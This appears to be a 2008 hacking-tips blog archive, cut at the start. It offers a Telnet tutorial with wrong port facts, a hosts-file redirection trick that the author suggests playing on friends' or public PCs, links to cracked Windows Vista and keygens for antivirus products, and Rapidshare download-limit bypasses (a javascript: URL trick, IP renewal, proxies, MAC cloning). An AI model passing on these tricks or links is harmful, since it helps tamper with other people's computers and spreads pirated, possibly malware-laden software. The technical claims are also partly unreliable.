it can connect to a server, any server instantly because of it's ability to emulate (copy)
remote computers.

Lets Start:
In Windows, Telnet can be found by going to Start -> Run and then typing telnet.
The application should then pop up. If you don't have Windows, there are many Telnet alternatives for mac, linux etc. Since I don't know any,search the internet for Telnet for Linux or Telnet for Mac and you should find something instantly.

If you have a PC and are using Windows 98/95, 2000, Me, or XP continue...

As you can see, Telnet has 4 menu options. These are Connect, Edit, Terminal, and Help.

If you click Connect, you should see more options. Here they are.

Connect:
Remote System..
Disconnect
Exit

Names of servers you have been on.

To connect to a server, click Remote System...
This will then take you to a dialog box that has these fields:

Hostname:
Port:
TermType:

There should also be a Connect button and a Cancel Button.

Lets go over these & what you should put in them.

-Hostname-

The Hostname can be the address of the website your going to be connecting to:
http://www.google.com
or it can be the IP address. Keep in mind that you can only connect to servers and not to clients (other PCs)
an IP Address looks like this: 64.233.167.99

-Port-
Port can bb either the port number you wanna connect to on the server (Port 80 is the Internet, Port 23 is Simple Mail Protocol then there are some more ports for different things..)
or you can keep it Telnet and see what happens.

-TermType-
TermType is the type of Terminal telnet will be acting like.
This doesn't matter most of the time, so you can keep it to default or try other ones if you want.

When you have all this set up, you can Click Connect & see what happens.

Note: Sometimes many servers don't like anon people just logging on, so be careful when logging onto servers, because sometimes it might be some big company that likes bullying people or just SOMEONE who likes bullying people and then they might want to find you or trace you or something and I know for a fact you don't need that happening.

Another Note: When you go to a server and type something, such as a login name or a password, you might not see anything even though you are typing. this is a feature that telnet or the other server uses. It's for some kind of safety measure.

Ok that's all for the Connect Menu, lets go over the Terminal menu.

The terminal menu should have 3 options:

Prefernces
Start Logging
Stop Logging.

-Prefernces-
If you go to this, a dialog box will come up with various options. Here, you can change the
text color & background color of the program, and you can enable Local Echo, which shows
you everything you've typed, Blinking cursor if you want the cursor to blink check it, if not un check, Block cursor if you want the cursor to be shown as a block, VT100 Arrows, don't worry about these they are useless, Buffer Size, this allows you to set the number of lines of text you want to be shown before the screen starts to scroll, The Terminal emulation type, always have this set on the default unless you know what the second one is and you know what your doing.

-Start Logging-
This logs everything you do on Telnet in a log file on your computer.

-Stop Logging-
This will stop logging processes.

Well that's it for basics of telnet. Thanks for reading.

F
or complete Guide on telnet visit happy hackers guide for telnet, Telnet: the Number One Hacker Tool is the guide title, from this guide really you can become a hacker

Hidden Redirection in Web Browser !

How about redirecting your web browser to a page which is not actually requested.
A simple text file edit makes sites redirect to another. When you type address in address bar in any browser and enter it then it will display another web page.
For eg: when you type Google.com in the browser you will be redirected to yahoo.com.

Instructions to do:

1) Go to this directory [c:\windows\system32\drivers\etc], directory may change according to drive used for os installation
2) then hit enter
3) find a file named "hosts"
4) Right click on it and open with word pad.
5) In the last link of the document type the IP* address of yahoo space
www.Google.com (Vice versa for other sites)
6) now save it
7) restart the browser if its already running
8) Now try it, It works perfect

IP*: To find IP address of a website:
Go to Start ->Run > type cmd > enter.
Now you have a new window on desktop. On that type ping www. yahoo.com (OR ping www.xyz.com)

Visual Explanation:



Recovery:Repeat the first four steps and remove the last line that you have inserted and save it and restart browser. Now its normal,
you can try this trick on your fried's pc and public pc and force them to blink.

*Please do it on your own risk.

Sunday, January 6, 2008

BitDefender 2008 : 100% working!!

Many of my visitors asked me to find out BitDefender Antivirus...which is top of the chart in best Security Apps.So here it is...

BitDefender Antivirus 2008- 32 bit
BitDefender Key Maker(2008)


BitDefender_Antivirus_Plus_10.2


*The content does not belong to website owner neither the owner takes any responsibility with the ill you end up with.

Windows Vista Home Premium(with crack)100% wrkn!!

Vista:
http://rapidshare.com/files/18808623/MSVHISO.part7.rar
http://rapidshare.com/files/18811219/MSVHISO.part6.rar
http://rapidshare.com/files/18809348/MSVHISO.part5.rar
http://rapidshare.com/files/18808111/MSVHISO.part4.rar
http://rapidshare.com/files/18801642/MSVHISO.part3.rar
http://rapidshare.com/files/18801565/MSVHISO.part2.rar
http://rapidshare.com/files/18805299/MSVHISO.part1.rar
Burn ISO file of it and boot from

Cracks
Windows Vista Crack:
http://rapidshare.com/files/18834798/Windows_Vista_Crack_MasterEntertainment.Org.rar
Vista_Time_Stopper_Crack_MasterEntertainment
http://rapidshare.com/files/18835638/Vista_Time_Stopper_Crack_MasterEntertainment.Org.rar

Rapidshare HackTo bypass timelimit of Rapidshare use proxies...or visit
http://techver2.blogspot.com/2007_12_30_archive.html#7080799657393056915

*Disclaimer:All the content does not belong to us and we do not take any responsibility.

STOP PIRACY!!

Thursday, January 3, 2008

Rapidshare Hacking:Guide for Beginners

Rapidshare is an excellent tool for sharing files all over but there are limitations for which we have worked out and here is the outcome.
Recently users have discovered ways of bypassing the download limits and skipping the waiting time. Here are a description of these methods.
1. Using JavaScript
*[ Javascript at present is not working because the bug is fixed]

  • Go to the page you want to download.
  • In the address bar put the following: javascript:alert(c=0)
  • Click OK .
  • Click OK to the pop-up box .
  • Enter the captcha .
  • Download Your File .

2. Requesting a new IP address from your ISP server.

Here's how to do it in windows:

  • Click Start
  • Click run
  • In the run box type cmd.exe and click OK
  • When the command prompt opens type the following.

ENTER after each new line.

ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit

Erase your cookies in whatever browser you are using.Try the rapidshare download again!Note:If you ISP has provided you with a fixed IP then it may not work.But this usually works.

3. Use a proxy with SwitchProxy and Firefox

  • Download and install Firefox if you have not already.[Get it]
  • Add Greasemonkey if you don't have.
  • Download and install FoxyProxy Add-on.
  • Google for free proxies.
  • When you hit your download limit, clean your cookies and change your proxy.

*Clearing cookies and changing IP is important.
If you don't know how to install add -ons(Greasemonkey,FoxyProxy):



When the file is downloaded.Open Firefox the open the file from it:

Like this


4. Anonymous Clients
They are nothing but the clients that support you to be annonymous on the internet so as to prevent your identity by using proxies. But you on your part have to enter the IP and Port for the proxies.

  • JAP-is a program that can help you to prevent yout IP address by providing you to connect through proxies.

Get it * to use this you must know about proxies and to use it.

  • Ulrasurf- is a good program which can select proxies from itself also and you can do it mannually also and can have upto 3 parallel downloads from Rapidshare.

Get it

Many more expert and professional tools for that will also be posted very soon.Please note that this article was only ment for beginners. We wan't everyone to learn everything so we take care of newbies also.

Wednesday, January 2, 2008

Latest Antivirus Apps: for Free!

Many of my readers asked me to provide all the latest antiviruses named as
Norton Anti Virus 2007
Kaspersky
IDM_5.11_Full
Teleport_Ultra_HTTPS_Edition_Full
!!!!!!! Get a copy of any site to borwsing it Offline !!!!!!!
Winzip_11.0_Full
Download_acccelerator_Premium_8.1.5.6
Norton_Partition_Magic_8_
WinRar_3.62_Gold_Edition_Full
PANDA_Antivirus_Firewall_2007
WinRARCrysta_2007
Ultimate_Windows_Vista_Suite_Wallpaper_Pack
Automatic_Wallpaper_Changer_2007
McAFee_Total_Protection__2007
Virtual_CD_8.006_FULL

and other useful tools...

So I found them all in a directory...

http://rapidshare.com/users/1EC869

Enjoy buddies.....
*We are not responsible for the above post and we do not take any responsibility if it violates any company's © policy.

Tuesday, January 1, 2008

RapidShare Hack: NIC tricks and MAC cloning -bypass download limit

This is how I get what I want from RapidShare without having to wait the 60+ minutes between downloads.


First off I have two methods I use. Granted this is still one file at a time, but you will not have to wait a hour+ between downloads.

First method is having two NICs and a hub.

My ISP uses static IPs .

  •  Download a file from RapidShare.

  •  Disable one nic and activate another after download is complete.
  •  While NIC is activating restart Modem. IPS will assign a new IP.

  •  Download another file.

  •  When download is complete, create a bridge between NICs while restarting modem. Your  ISP will assign a new IP.

This will get you three files in time limit set by RapidShare.

This method is not that high speed but is better then one file an hour.


Second method uses MAC cloaning application.

It will allow you to change your MAC address of your NIC.

Install MAC cloaning app (search Google from appz) Different appz have different procedures, read the help file to figure out what you are doing. I use SMAC, it is pretty simple.

  • Download file from RapidShare.

  • Change MAC address (don't change until the current file is finished downloadling)

  • Restart Modem, ISP will issue a new IP for new MAC address. Takes less then 15 seconds.

  • Download another file from RapidShare

I know these methods are not the greatest, but I have not found anything else that works as painless as these.

Disclamair:This article,we have found in an Orkut forum and we do not take any © authorities. Please forgive us if it violates any © policy.